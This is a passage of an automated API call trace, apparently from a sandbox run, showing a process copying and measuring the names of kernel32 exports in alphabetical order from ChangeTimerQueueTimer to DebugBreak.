lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.410] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.410] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.410] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.410] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.410] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.410] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.411] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.411] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.411] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.411] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.411] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.411] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.411] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.411] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.411] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.411] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.412] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.412] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.412] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.412] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.412] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.412] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.412] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.412] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.412] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.412] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.412] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.412] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.412] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.412] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.412] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.412] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.412] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.412] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.413] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.413] lstrlenA (lpString="COPYFILEA") returned 9 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.413] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.413] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.413] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.413] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.413] lstrlenA (lpString="COPYFILEW") returned 9 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.413] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.413] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.413] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.413] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.413] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.413] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.413] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.413] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.413] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.413] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.413] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.414] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.414] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.414] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.414] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.414] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.414] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.414] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.414] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.414] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.414] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.414] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.414] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.414] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.414] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.414] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.414] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.414] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.415] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.415] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.415] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.415] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.415] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.415] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.415] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.415] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.415] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.415] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.415] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.415] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.415] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.415] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.415] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.415] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.415] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.415] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.415] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.416] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.416] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.416] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.416] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.416] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.416] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.416] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.416] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.416] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.416] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.416] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.416] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.416] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.416] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.416] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.416] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.416] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.416] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.416] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.417] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.417] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.417] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.417] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.417] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.417] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.417] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.417] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.417] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.417] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.417] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.417] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.417] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") 